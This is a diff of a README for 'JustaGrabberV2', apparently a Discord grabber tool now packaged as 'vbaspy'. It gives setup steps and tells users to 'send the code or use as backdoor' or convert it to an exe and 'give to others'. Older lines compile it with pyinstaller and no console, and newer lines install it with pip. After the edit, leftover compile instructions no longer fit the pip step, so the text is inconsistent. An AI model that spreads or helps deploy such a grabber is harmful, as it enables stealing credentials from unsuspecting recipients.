KLDiscord/vbaspy/README.md

 JustaGrabberV2 will just exit.

 ### 📁・ How to use
 1. Download python 3 at [python.org](https://python.org).
-Must be 3.x.x
+Must be version 3 or higher with add to path
-2. Open "JustaGrabberV2.py" with any code editor.
+2. Download the vbaspy library ( you can see details at the bottom )
 3. Replace Your settings at line 20-27
 4. Send the code or use as backdoor.
 Or convert to exe then give to others

-### ⚙・How to compile .py to .exe
+### ⚙・How to download package ( for Windows, other, you can find it on youtube )
-First, install pyinstaller using pip in cmd. ( pip install pyinstaller ) And you must have to check to 'Add python x.x.x to path' when you install Open cmd in the directory that the JustaGrabbeV2r.py is in then type :
+You must have to check to 'Add python (version) to path' when you install Open cmd at start menu, and then type :
 ```
-pyinstaller --onefile --clean --noconsole JustaGrabberV2.py
+pip install vbaspy
 ```
 replace JustaGrabber.py to your file name.
 3 folders and 1 file will be created, delete except for the dist folder.